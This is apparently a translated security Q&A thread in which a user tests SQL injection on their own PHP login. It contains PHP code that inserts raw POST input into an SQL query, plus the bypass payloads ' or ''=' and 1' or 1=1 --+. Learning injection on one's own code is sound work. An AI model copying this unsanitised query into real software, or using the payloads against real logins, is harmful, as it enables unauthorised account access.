Escribí una inyección SQL básica para mi inicio de sesión simple php, pero no funciona

1

Estoy intentando omitir mi código de inicio de sesión

Lo intento:

Username : ' or ''='
Password : ' or ''='

y

Username : ' or 1--
Password : 

Siguiente es el php:

 <?php
require_once('conn.php');

$empID      = $_POST['empID'];  
$password   = $_POST['password'];
$qry = mysql_query("SELECT * FROM 'sf_ohem_login' WHERE  empID='$empID' && password='$password'") ;
$num = mysql_num_rows($qry);
if($num==0)
{
    $data["login"]="false";
    $data["empID"]= $empID;
    $data["msg"]="Login failed due to wrong credentials";
}
else
{   
        $data["login"]="true";
        $data["empID"]= $empID;
        $data["password"]= $password;
}
echo json_encode($data);
    
pregunta DivisinSi 17.09.2016 - 09:05
fuente

1 respuesta

1

Prueba:

1' or 1=1 --+

Después de inyectar esta consulta, su código PHP funcionará así:

empID='1' or 1=1 --+
    
respondido por el Zaw Htet Naing 18.09.2016 - 11:18
fuente

Lea otras preguntas en las etiquetas